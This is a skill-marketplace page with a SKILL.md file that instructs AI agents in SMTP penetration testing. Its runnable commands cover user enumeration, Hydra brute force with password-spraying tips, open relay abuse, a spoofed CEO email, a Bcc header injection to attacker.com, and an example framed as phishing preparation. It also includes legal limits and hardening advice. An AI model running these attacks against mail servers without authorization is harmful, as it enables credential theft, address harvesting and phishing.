How do I install SMTP Penetration Testing?

Install SMTP Penetration Testing with a single command: npx mdskills install sickn33/smtp-penetration-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support SMTP Penetration Testing?

SMTP Penetration Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

SMTP Penetration Testing

Name: SMTP Penetration Testing: AI Agent Skill
Rating: 9 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/smtp-penetration-testing

Fork & Edit

Skill Advisor9.0

Comprehensive penetration testing guide with clear phases, commands, and security recommendations

+Provides structured 10-phase workflow with actionable commands and tool examples
+Includes detailed quick reference tables, response codes, and troubleshooting guidance
+Addresses ethical boundaries and legal requirements explicitly
-Lacks specific trigger conditions to help agents know when to automatically invoke this skill

SKILL.md

Edit in Browser

1---
2name: SMTP Penetration Testing
3description: This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# SMTP Penetration Testing
10 
11## Purpose
12 
13Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.
14 
15## Prerequisites
16 
17### Required Tools
18```bash
19# Nmap with SMTP scripts
20sudo apt-get install nmap
21 
22# Netcat
23sudo apt-get install netcat
24 
25# Hydra for brute force
26sudo apt-get install hydra
27 
28# SMTP user enumeration tool
29sudo apt-get install smtp-user-enum
30 
31# Metasploit Framework
32msfconsole
33```
34 
35### Required Knowledge
36- SMTP protocol fundamentals
37- Email architecture (MTA, MDA, MUA)
38- DNS and MX records
39- Network protocols
40 
41### Required Access
42- Target SMTP server IP/hostname
43- Written authorization for testing
44- Wordlists for enumeration and brute force
45 
46## Outputs and Deliverables
47 
481. **SMTP Security Assessment Report** - Comprehensive vulnerability findings
492. **User Enumeration Results** - Valid email addresses discovered
503. **Relay Test Results** - Open relay status and exploitation potential
514. **Remediation Recommendations** - Security hardening guidance
52 
53## Core Workflow
54 
55### Phase 1: SMTP Architecture Understanding
56 
57```
58Components: MTA (transfer) → MDA (delivery) → MUA (client)
59 
60Ports: 25 (SMTP), 465 (SMTPS), 587 (submission), 2525 (alternative)
61 
62Workflow: Sender MUA → Sender MTA → DNS/MX → Recipient MTA → MDA → Recipient MUA
63```
64 
65### Phase 2: SMTP Service Discovery
66 
67Identify SMTP servers and versions:
68 
69```bash
70# Discover SMTP ports
71nmap -p 25,465,587,2525 -sV TARGET_IP
72 
73# Aggressive service detection
74nmap -sV -sC -p 25 TARGET_IP
75 
76# SMTP-specific scripts
77nmap --script=smtp-* -p 25 TARGET_IP
78 
79# Discover MX records for domain
80dig MX target.com
81nslookup -type=mx target.com
82host -t mx target.com
83```
84 
85### Phase 3: Banner Grabbing
86 
87Retrieve SMTP server information:
88 
89```bash
90# Using Telnet
91telnet TARGET_IP 25
92# Response: 220 mail.target.com ESMTP Postfix
93 
94# Using Netcat
95nc TARGET_IP 25
96# Response: 220 mail.target.com ESMTP
97 
98# Using Nmap
99nmap -sV -p 25 TARGET_IP
100# Version detection extracts banner info
101 
102# Manual SMTP commands
103EHLO test
104# Response reveals supported extensions
105```
106 
107Parse banner information:
108 
109```
110Banner reveals:
111- Server software (Postfix, Sendmail, Exchange)
112- Version information
113- Hostname
114- Supported SMTP extensions (STARTTLS, AUTH, etc.)
115```
116 
117### Phase 4: SMTP Command Enumeration
118 
119Test available SMTP commands:
120 
121```bash
122# Connect and test commands
123nc TARGET_IP 25
124 
125# Initial greeting
126EHLO attacker.com
127 
128# Response shows capabilities:
129250-mail.target.com
130250-PIPELINING
131250-SIZE 10240000
132250-VRFY
133250-ETRN
134250-STARTTLS
135250-AUTH PLAIN LOGIN
136250-8BITMIME
137250 DSN
138```
139 
140Key commands to test:
141 
142```bash
143# VRFY - Verify user exists
144VRFY admin
145250 2.1.5 admin@target.com
146 
147# EXPN - Expand mailing list
148EXPN staff
149250 2.1.5 user1@target.com
150250 2.1.5 user2@target.com
151 
152# RCPT TO - Recipient verification
153MAIL FROM:<test@attacker.com>
154RCPT TO:<admin@target.com>
155# 250 OK = user exists
156# 550 = user doesn't exist
157```
158 
159### Phase 5: User Enumeration
160 
161Enumerate valid email addresses:
162 
163```bash
164# Using smtp-user-enum with VRFY
165smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP
166 
167# Using EXPN method
168smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP
169 
170# Using RCPT method
171smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP
172 
173# Specify port and domain
174smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com
175```
176 
177Using Metasploit:
178 
179```bash
180use auxiliary/scanner/smtp/smtp_enum
181set RHOSTS TARGET_IP
182set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
183set UNIXONLY true
184run
185```
186 
187Using Nmap:
188 
189```bash
190# SMTP user enumeration script
191nmap --script smtp-enum-users -p 25 TARGET_IP
192 
193# With custom user list
194nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP
195```
196 
197### Phase 6: Open Relay Testing
198 
199Test for unauthorized email relay:
200 
201```bash
202# Using Nmap
203nmap -p 25 --script smtp-open-relay TARGET_IP
204 
205# Manual testing via Telnet
206telnet TARGET_IP 25
207HELO attacker.com
208MAIL FROM:<test@attacker.com>
209RCPT TO:<victim@external-domain.com>
210DATA
211Subject: Relay Test
212This is a test.
213.
214QUIT
215 
216# If accepted (250 OK), server is open relay
217```
218 
219Using Metasploit:
220 
221```bash
222use auxiliary/scanner/smtp/smtp_relay
223set RHOSTS TARGET_IP
224run
225```
226 
227Test variations:
228 
229```bash
230# Test different sender/recipient combinations
231MAIL FROM:<>
232MAIL FROM:<test@[attacker_IP]>
233MAIL FROM:<test@target.com>
234 
235RCPT TO:<test@external.com>
236RCPT TO:<"test@external.com">
237RCPT TO:<test%external.com@target.com>
238```
239 
240### Phase 7: Brute Force Authentication
241 
242Test for weak SMTP credentials:
243 
244```bash
245# Using Hydra
246hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP
247 
248# With specific port and SSL
249hydra -l admin -P passwords.txt -s 465 -S TARGET_IP smtp
250 
251# Multiple users
252hydra -L users.txt -P passwords.txt TARGET_IP smtp
253 
254# Verbose output
255hydra -l admin -P passwords.txt smtp://TARGET_IP -V
256```
257 
258Using Medusa:
259 
260```bash
261medusa -h TARGET_IP -u admin -P /path/to/passwords.txt -M smtp
262```
263 
264Using Metasploit:
265 
266```bash
267use auxiliary/scanner/smtp/smtp_login
268set RHOSTS TARGET_IP
269set USER_FILE /path/to/users.txt
270set PASS_FILE /path/to/passwords.txt
271set VERBOSE true
272run
273```
274 
275### Phase 8: SMTP Command Injection
276 
277Test for command injection vulnerabilities:
278 
279```bash
280# Header injection test
281MAIL FROM:<attacker@test.com>
282RCPT TO:<victim@target.com>
283DATA
284Subject: Test
285Bcc: hidden@attacker.com
286X-Injected: malicious-header
287 
288Injected content
289.
290```
291 
292Email spoofing test:
293 
294```bash
295# Spoofed sender (tests SPF/DKIM protection)
296MAIL FROM:<ceo@target.com>
297RCPT TO:<employee@target.com>
298DATA
299From: CEO <ceo@target.com>
300Subject: Urgent Request
301Please process this request immediately.
302.
303```
304 
305### Phase 9: TLS/SSL Security Testing
306 
307Test encryption configuration:
308 
309```bash
310# STARTTLS support check
311openssl s_client -connect TARGET_IP:25 -starttls smtp
312 
313# Direct SSL (port 465)
314openssl s_client -connect TARGET_IP:465
315 
316# Cipher enumeration
317nmap --script ssl-enum-ciphers -p 25 TARGET_IP
318```
319 
320### Phase 10: SPF, DKIM, DMARC Analysis
321 
322Check email authentication records:
323 
324```bash
325# SPF/DKIM/DMARC record lookups
326dig TXT target.com | grep spf            # SPF
327dig TXT selector._domainkey.target.com    # DKIM
328dig TXT _dmarc.target.com                 # DMARC
329 
330# SPF policy: -all = strict fail, ~all = soft fail, ?all = neutral
331```
332 
333## Quick Reference
334 
335### Essential SMTP Commands
336 
337| Command | Purpose | Example |
338|---------|---------|---------|
339| HELO | Identify client | `HELO client.com` |
340| EHLO | Extended HELO | `EHLO client.com` |
341| MAIL FROM | Set sender | `MAIL FROM:<sender@test.com>` |
342| RCPT TO | Set recipient | `RCPT TO:<user@target.com>` |
343| DATA | Start message body | `DATA` |
344| VRFY | Verify user | `VRFY admin` |
345| EXPN | Expand alias | `EXPN staff` |
346| QUIT | End session | `QUIT` |
347 
348### SMTP Response Codes
349 
350| Code | Meaning |
351|------|---------|
352| 220 | Service ready |
353| 221 | Closing connection |
354| 250 | OK / Requested action completed |
355| 354 | Start mail input |
356| 421 | Service not available |
357| 450 | Mailbox unavailable |
358| 550 | User unknown / Mailbox not found |
359| 553 | Mailbox name not allowed |
360 
361### Enumeration Tool Commands
362 
363| Tool | Command |
364|------|---------|
365| smtp-user-enum | `smtp-user-enum -M VRFY -U users.txt -t IP` |
366| Nmap | `nmap --script smtp-enum-users -p 25 IP` |
367| Metasploit | `use auxiliary/scanner/smtp/smtp_enum` |
368| Netcat | `nc IP 25` then manual commands |
369 
370### Common Vulnerabilities
371 
372| Vulnerability | Risk | Test Method |
373|--------------|------|-------------|
374| Open Relay | High | Relay test with external recipient |
375| User Enumeration | Medium | VRFY/EXPN/RCPT commands |
376| Banner Disclosure | Low | Banner grabbing |
377| Weak Auth | High | Brute force attack |
378| No TLS | Medium | STARTTLS test |
379| Missing SPF/DKIM | Medium | DNS record lookup |
380 
381## Constraints and Limitations
382 
383### Legal Requirements
384- Only test SMTP servers you own or have authorization to test
385- Sending spam or malicious emails is illegal
386- Document all testing activities
387- Do not abuse discovered open relays
388 
389### Technical Limitations
390- VRFY/EXPN often disabled on modern servers
391- Rate limiting may slow enumeration
392- Some servers respond identically for valid/invalid users
393- Greylisting may delay enumeration responses
394 
395### Ethical Boundaries
396- Never send actual spam through discovered relays
397- Do not harvest email addresses for malicious use
398- Report open relays to server administrators
399- Use findings only for authorized security improvement
400 
401## Examples
402 
403### Example 1: Complete SMTP Assessment
404 
405**Scenario:** Full security assessment of mail server
406 
407```bash
408# Step 1: Service discovery
409nmap -sV -sC -p 25,465,587 mail.target.com
410 
411# Step 2: Banner grab
412nc mail.target.com 25
413EHLO test.com
414QUIT
415 
416# Step 3: User enumeration
417smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t mail.target.com
418 
419# Step 4: Open relay test
420nmap -p 25 --script smtp-open-relay mail.target.com
421 
422# Step 5: Authentication test
423hydra -l admin -P /usr/share/wordlists/fasttrack.txt smtp://mail.target.com
424 
425# Step 6: TLS check
426openssl s_client -connect mail.target.com:25 -starttls smtp
427 
428# Step 7: Check email authentication
429dig TXT target.com | grep spf
430dig TXT _dmarc.target.com
431```
432 
433### Example 2: User Enumeration Attack
434 
435**Scenario:** Enumerate valid users for phishing preparation
436 
437```bash
438# Method 1: VRFY
439smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25
440 
441# Method 2: RCPT with timing analysis
442smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com
443 
444# Method 3: Metasploit
445msfconsole
446use auxiliary/scanner/smtp/smtp_enum
447set RHOSTS 192.168.1.100
448set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
449run
450 
451# Results show valid users
452[+] 192.168.1.100:25 - Found user: admin
453[+] 192.168.1.100:25 - Found user: root
454[+] 192.168.1.100:25 - Found user: postmaster
455```
456 
457### Example 3: Open Relay Exploitation
458 
459**Scenario:** Test and document open relay vulnerability
460 
461```bash
462# Test via Telnet
463telnet mail.target.com 25
464HELO attacker.com
465MAIL FROM:<test@attacker.com>
466RCPT TO:<test@gmail.com>
467# If 250 OK - VULNERABLE
468 
469# Document with Nmap
470nmap -p 25 --script smtp-open-relay --script-args smtp-open-relay.from=test@attacker.com,smtp-open-relay.to=test@external.com mail.target.com
471 
472# Output:
473# PORT   STATE SERVICE
474# 25/tcp open  smtp
475# |_smtp-open-relay: Server is an open relay (14/16 tests)
476```
477 
478## Troubleshooting
479 
480| Issue | Cause | Solution |
481|-------|-------|----------|
482| Connection Refused | Port blocked or closed | Check port with nmap; ISP may block port 25; try 587/465; use VPN |
483| VRFY/EXPN Disabled | Server hardened | Use RCPT TO method; analyze response time/code variations |
484| Brute Force Blocked | Rate limiting/lockout | Slow down (`hydra -W 5`); use password spraying; check for fail2ban |
485| SSL/TLS Errors | Wrong port or protocol | Use 465 for SSL, 25/587 for STARTTLS; verify EHLO response |
486 
487## Security Recommendations
488 
489### For Administrators
490 
4911. **Disable Open Relay** - Require authentication for external delivery
4922. **Disable VRFY/EXPN** - Prevent user enumeration
4933. **Enforce TLS** - Require STARTTLS for all connections
4944. **Implement SPF/DKIM/DMARC** - Prevent email spoofing
4955. **Rate Limiting** - Prevent brute force attacks
4966. **Account Lockout** - Lock accounts after failed attempts
4977. **Banner Hardening** - Minimize server information disclosure
4988. **Log Monitoring** - Alert on suspicious activity
4999. **Patch Management** - Keep SMTP software updated
50010. **Access Controls** - Restrict SMTP to authorized IPs
501

Full transparency — inspect the skill content before installing.